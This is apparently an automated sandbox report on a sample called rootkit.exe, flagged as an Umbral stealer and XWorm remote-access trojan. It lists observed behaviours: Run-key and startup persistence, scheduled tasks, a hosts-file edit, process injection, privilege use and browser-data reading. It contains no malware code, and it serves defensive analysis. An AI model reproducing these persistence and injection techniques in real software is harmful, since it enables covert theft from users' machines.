Malware Analysis Report

2024-10-10 09:55

Sample ID 240709-blql3s1crg
Target rootkit.exe
SHA256 f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc
Tags
umbral xworm execution persistence rat spyware stealer trojan evasion
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

Threat Level: Known bad

The file rootkit.exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm execution persistence rat spyware stealer trojan evasion

Detect Xworm Payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Umbral

Modifies security service

Detect Umbral payload

Xworm

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Checks computer location settings

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious use of UnmapMainImage

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Detects videocard installed

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 01:14

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-09 01:14

Reported

2024-07-09 01:17

Platform

win10v2004-20240708-en

Max time kernel

150s

Max time network

151s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2956 created 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\XClient C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2956 set thread context of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720487765" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1884 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 1884 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 1884 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 1884 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 1884 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 1884 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 1884 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1884 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1884 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 3184 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
